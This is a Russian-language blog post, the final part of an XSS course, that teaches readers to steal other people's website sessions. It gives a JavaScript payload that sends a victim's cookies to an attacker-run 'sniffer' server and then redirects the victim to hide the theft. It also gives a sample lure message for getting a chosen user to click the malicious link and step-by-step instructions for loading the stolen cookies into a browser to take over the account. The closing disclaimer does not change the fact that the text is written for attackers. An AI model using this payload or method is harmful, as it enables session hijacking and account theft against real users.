XSS уязвимости, полный курс в несколько статей.№3
Автор: Azer333 30.11.2016 17:48
Доброго времени суток друзья, это заключительная статья на тему XSS, сегодня мы наконец то научимся реализовывать данную уязвимость.
- И так поехали, для этого нам необходимы следующие вещи:
- Уязвимость типа XSS на каком либо сайте
- Онлайн снифер
- Ну и конечно же самое главное это прямые руки :-)
Уязвимость может быть двух типов как активная, так и пассивная, с этим мы уже разобрались, давайте лучше разберемся что такое онлайн снифер - это такая зверюшка которая находится на каком не будь сервере в Интернете(если у вас имеется собственный сервер в Интернете то советую вам установить туда и использовать свой личный снифер, скрипт снифера можно найти в гугле их там полным полно), он перехватывает некоторую информацию у пользователя который перешел по ссылке ведущая на снифер. А информация содержится обычно такая, с какого сайта пришел пользователь, его IP-адрес, его клиент (то есть какой браузер он использует) а так же снифер может перехватывать cookies, но только если их передаст JavaScript именно для этого необходима уязвимость на сайте. Ну про прямые руки думаю объяснять не нужно(ну а кто сам не догадался советую закрыть страничку, так как это бесполезно). Допустим что вы уже установили себе на сервер снифер ну или же воспользовались каким то онлайн сниером на чужом сервере. Если вы нашли на сайте активную XSS, то вам необходимо отправить серверу вот такой код
[script]document.location.href=”здесь полный путь к сниферу в конце ставите вопросительный знак?”+document.cookie;
document.location.href=”тут пишите ссылку на другую страничку на этом сервере что бы пользователь ничего не заподозрил” [/script]
За скобками указывается объект JavaScript который и передает сниферу cookies пользователя. И теперь какой бы пользователь не зашел на эту страничку с вредоносным кодом его данные автоматически передадутся сниферу и после этого в его браузере откроется страничка, которую вы укажите во второй строчке. Ну это конечно же если повезет найти активную XSS но как говорит статистика такие случаи попадаются очень редко и чаще всего попадаются пассивные XSS, а теперь давайте разберемся как ее использовать. Данный вид уязвимости не может работать без участия человека, кто читал предыдущую статью то знает, так вот тут придется поработать не только ручками, но и головой. Во первых вам понадобится какой не будь сервер с прямой ссылкой где можно будет разместить файл 1.js например http://narod.ru , теперь создайте на своем компьютере этот файл откройте его и запишите следующие строки
document.location.href=”здесь полный путь к сниферу в конце ставите вопросительн знак?”+document.cookie;
document.locaion.href=”тут какой не буть сайт или ссылку на страничку с фотографиями.”
После залейте его на сервер, теперь выбираем пользователя у которого вы хотите украсть cookies и отправляете ему ссылку найденной уязвимостью вот в таком формате (например ссылку нашли тут) http://site.ru/search.php?s=3
Отправляете эту ссылку например с таким текстом. «Приветствую дружище, слушай смотри че за фотки я нашел перейди по ССЫЛКЕ» в слове ссылке должна находиться именно эта ссылка которая описана выше. После того как юзер перейдет по ссылке то он оставит все свои данные на снифере, вы заходите на снифер и копируйте перехваченные cookies после этого заходите в браузер например opera – Ctrl+F12 – Advanced – в списке слева выбираете cookies – управление cookies- в строке поиска пишите сайт на котором наодится уязвимость – после увидите много полей наодите одинаковые на тех cookies которые полуили на снифер и вбиваете их в те что находятся в браузере. После того как все cookies вбили в браузер, жмете ОК и заходите на этот сайт или же если у вас открыта эта страничка то перезагружаете ее, после перезагрузки вы должны попасть в учетную запись того пользователь у которого воровали cookies.
Ну а теперь само главное, данная информация представляется только в ознакомительных цлях и автор не несет никакой ответственности за ваши действия, так это карается законом РФ :-).
До новых встреч друзья…
Твитнуть |